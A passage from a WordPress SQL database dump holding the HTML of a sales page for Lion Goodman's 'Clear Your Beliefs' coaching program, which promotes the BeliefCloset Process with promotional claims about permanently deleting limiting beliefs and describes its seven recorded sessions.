anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\r\n\r\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:46:35', '2015-07-08 14:46:35', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2235, 2, '2015-08-06 00:22:46', '2015-08-06 05:22:46', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, 